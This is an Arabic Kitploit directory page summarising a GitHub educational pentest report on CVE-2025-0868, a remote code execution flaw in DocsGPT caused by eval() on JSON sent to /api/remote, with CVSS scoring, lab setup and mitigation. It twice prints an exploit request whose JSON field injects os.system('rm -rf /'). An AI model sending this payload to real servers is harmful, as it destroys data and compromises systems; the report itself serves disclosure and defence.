Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-0868 — تقرير تعليمي لاختبار الاختراق يوضح استغلال CVE-2025-0868، وهي ثغرة RCE خطيرة في DocsGPT من خلال استدعاء eval() غير آمن في تحليل JSON، مع استراتيجيات التخفيف. | Kitploit
أدوات/GitHubGitHub/aidana-gift/cve-2025-0868
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubaidana-gift/cve-2025-0868

CVE-2025-0868

تقرير تعليمي لاختبار الاختراق يوضح استغلال CVE-2025-0868، وهي ثغرة RCE خطيرة في DocsGPT من خلال استدعاء eval() غير آمن في تحليل JSON، مع استراتيجيات التخفيف.

عرض المستودع
11منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تقرير مشروع اختبار الاختراق: استغلال CVE-2025-0868 (تنفيذ التعليمات البرمجية عن بعد في DocsGPT عبر تقييم JSON)

1. مقدمة

تم الكشف عن ثغرة خطيرة لتنفيذ التعليمات البرمجية عن بعد (RCE) (CVE-2025-0868) في 20 فبراير 2025، في مكتبة DocsGPT مفتوحة المصدر، ناتجة عن الاستخدام غير الآمن لـ eval() عند تحليل حمولات JSON.

التفاصيل الرئيسية:

  • يؤثر على إصدارات DocsGPT من 0.8.1 إلى 0.12.0
  • درجة CVSS 4.0 تبلغ 9.3 (حرجة)
  • يسمح بحقن تعليمات برمجية غير مصادق عليه ويمكن الوصول إليه عبر الشبكة
  • تأثير كامل على السرية والنزاهة والتوافر

حول CVE-2025-0868

تسمح هذه الثغرة للمهاجمين بتنفيذ تعليمات Python برمجية عشوائية عبر نقطة النهاية /api/remote. DocsGPT هي أداة ذكاء اصطناعي توليدي مفتوحة المصدر تتيح الاستعلام عن وثائق المشروع باستخدام نماذج GPT.

أهداف المشروع

  • تحليل الخلفية الفنية للثغرة
  • إعادة إنتاجها في بيئة معملية خاضعة للرقابة
  • توضيح تأثير الاستغلال
  • اقتراح استراتيجيات التخفيف
  • تقديم الاستنتاجات

2. تحليل الثغرة

2.1 نظرة عامة على الثغرة

2.2 توزيع CVSS 4.0

المتجه: AV:N/AC:L/PR:N/UI:N/VC:H/VI:H/VA:H
الدرجة الأساسية: 9.3 (حرجة)

مقاييس قابلية الاستغلال:

  • ناقل الهجوم (AV): شبكة (N)
  • تعقيد الهجوم (AC): منخفض (L)
  • الامتيازات المطلوبة (PR): لا شيء (N)
  • تفاعل المستخدم (UI): لا شيء (N)

مقاييس التأثير:

  • السرية (VC): عالية
  • النزاهة (VI): عالية
  • التوافر (VA): عالية

2.3 الغوص الفني

توجد الثغرة في reddit_loader.py حيث تتم معالجة إدخال المستخدم باستخدام الدالة غير الآمنة eval():

root@kitploit:~
def load_data(self, inputs):
    data = eval(inputs)  # تعليمات برمجية ضعيفة
    client_id = data.get("client_id")
    client_secret = data.get("client_secret")
    user_agent = data.get("user_agent")

يسمح هذا للمهاجم بتنفيذ تعليمات Python برمجية ضارة داخل حقول JSON: POST /api/remote HTTP/1.1 Content-Type: application/json

{"data": "import('os').system('rm -rf /')"}

استغلال CVE-2025-0868 في DocsGPT

3. عملية الاستغلال

3.1 إعداد البيئة المعملية

لاستغلال هذه الثغرة، قمنا بإعادة إنشاء البيئة الضعيفة ومساحة عمل آمنة باستخدام:

  • الجهاز الظاهري: Kali Linux 2024
  • إصدار DocsGPT: 0.12.0 (الإصدارات الضعيفة: 0.8.0 - 0.12.0)
  • الأدوات المستخدمة: Python, Docker

3.2 تطوير الاستغلال

قمنا بتطوير نص برمجي بلغة Python ينفذ تنفيذ التعليمات البرمجية عن بعد (RCE) عن طريق إرسال حمولة ضارة إلى نقطة النهاية /api/remote، مستغلاً الاستخدام غير الآمن لـ eval().

خطوات الاستغلال الرئيسية

  1. الاستطلاع: تحديد إصدار DocsGPT عبر رؤوس HTTP.
  2. تحديد الثغرة: RCE في نقطة النهاية /api/remote.
  3. صياغة الحمولة: حقن تعليمات Python برمجية.
  4. الاستغلال: إرسال JSON ضار إلى /api/remote.

مثال على طلب ضعيف

root@kitploit:~
POST /api/remote HTTP/1.1
Content-Type: application/json

{"data": "__import__('os').system('rm -rf /')"}

4. الإجراءات المضادة والتخفيف

4.1 الإصلاحات الفورية

قم بالتحديث إلى DocsGPT v0.12.1 والإصدارات الأحدث

4.2 إصلاح التعليمات البرمجية

استبدل eval() بـ json.loads().

الرابط:https://github.com/arc53/DocsGPT/blob/df9d432d29c1bbdf28abb3d35d129060b1964dd3/applicatio n/parser/remote/reddit_loader.py#L9

تنزيل الأداة
الفئةالتفاصيل
معرف CVECVE-2025-0868
البرنامج المتأثرDocsGPT v0.8.1 – v0.12.0
نوع الثغرةتنفيذ التعليمات البرمجية عن بعد (RCE)
ناقل الهجومقائم على الشبكة (طلب HTTP إلى /api/remote)
السبب الجذريالاستخدام غير الآمن لـ eval() على إدخال JSON غير موثوق
التأثيراختراق كامل للخادم (تنفيذ أوامر عشوائية)
تعيين CWECWE-77: تحييد غير صحيح للعناصر الخاصة المستخدمة في الأمر